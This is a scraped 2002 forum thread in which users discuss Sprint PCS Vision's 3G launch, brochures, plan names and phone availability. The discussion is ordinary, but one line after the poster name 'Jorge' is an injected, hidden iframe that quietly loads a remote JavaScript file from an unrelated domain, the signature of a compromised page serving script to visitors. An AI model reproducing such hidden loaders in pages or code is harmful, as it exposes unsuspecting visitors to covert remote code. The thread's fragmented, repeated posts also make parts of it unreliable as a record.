+ Reply to Thread

Sprint Vision logon already at sprintpcs.com

I just went lo logon to my sprint Account, and it has a dual logon screen, on the right it says PCS Vision login, I guess they're almost ready to go on the 3g launch.

Jorge <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Sprint Free&Clear w/ Vision Brochure

http://home.bendcable.com/devin/vision1.JPG
    http://home.bendcable.com/devin/vision2.JPG

Dunno how legit this is..but looks pretty close to what we have seen online.. Just interesting info FWIW...

MW

Napoleon Bonaparte Jr.

Hello

SURPRISE !!!!

ARE THESE PRICES SURPRISING YOU ?
    Attached Thumbnails Attached Thumbnails Sprint Vision logon already at sprintpcs.com-aaa.jpg  

Administrator

Arrow

i was reading the treos use manual at the fcc site and at the end of the document where the warranty and legal wording is, i saw two things that intrigued me and was wondering if anyone else has know or noticed this...

they seem to have to 'new' plans (atleast to me)

Home Rate USA and

Toll-Free Usa.

Home rate USA lets you make and receive calls anywhere on the pcs network at your home service area airtime rate.

the latter lets you make calls anywhere on the pcs network to anywhere in the us, puerto rico, and virgin islands and be charged your home service area airtime rates, with no additional long distance charges.

so are these new or have they been around for ages...

Sprint Vision

According to several sources (CNET, etc) Sprint 3G will be launched nationwide on Thursday (8/8/02). Yahoooo!

Napoleon Bonaparte Jr.

Hello

druce

Sprint Vision
    According to several sources (CNET, etc) Sprint 3G will be launched nationwide on Thursday (8/8/02). Yahoooo
    ..............................................................................

Launching what ? In Best Buy they have two trashy

new phones , not even Palm OS .

3G its a watching movie on your phone .

3G its downloading the MP3 on your phone .

But with the price $99 for 8 megs in a month

You can send only SMS messages .

Its a Joke !
    Last edited by sprint; 08-07-2002 at 11:16 PM.

www.3gforfree.com
    Sprint is launching 3G today. If you dont believe it, walk into a sprint pcs store. you will see new displays and new phones up. Basically it is a soft launch were no media is involved, but the service is available for customers. The hard launch will not be until tuesday the 13th of august

FYI!!

I just picked up the new treo 300 at sprint in Boston, MA. Unfortuntately I can't activate the phone until 12:00 on Sunday.

FYI:

I just went to the Sprint PCS store in Des Moines, Iowa. Well, its not a big city. They have no 3G phones at all. They do have the wireless card for PCs.

They also said that they can't configure a phone for 3G service until Sunday or Monday.

The whole 8/8 thing was overhyped, its really Sunday.

-Jerry

I hope I understanded your post.

Sprint has had nationwide calling for a long time. You are effectively billed at "home" rate. No long distance charge nationwide, like you said.

-Jerry

What you are looking at in the pictures are actual brochures that are in the Sprint stores now.

They list all the plans and some of the new phones that are for sale.
    Si hoc Legere Scis Nimium Eruditionis habes.

I stopped by a SPCS store last night and they didn't have any materials and the flunky behind the counter didn't know what I was talking about. Maybe they put the literature out today?

Napoleon Bonaparte Jr.

Administrator
    Originally posted by gcaussade
    I hope I understanded your post.

Sprint has had nationwide calling for a long time. You are effectively billed at "home" rate. No long distance charge nationwide, like you said.

-Jerry

all im saying is i have never heard that "terminology before". ive been with sprint for over 4 years so i know their busines model. im just saying i have not heard of any plan caled this. however i KNOW it sounds like any typical sprint plan. im just asking for opinions as to why they (sprint) would name it home rate? capiche?

no big deal, just asking. as i said, ive never seen this "wording" before and just wondered what is different from that plan over any other sprint plan.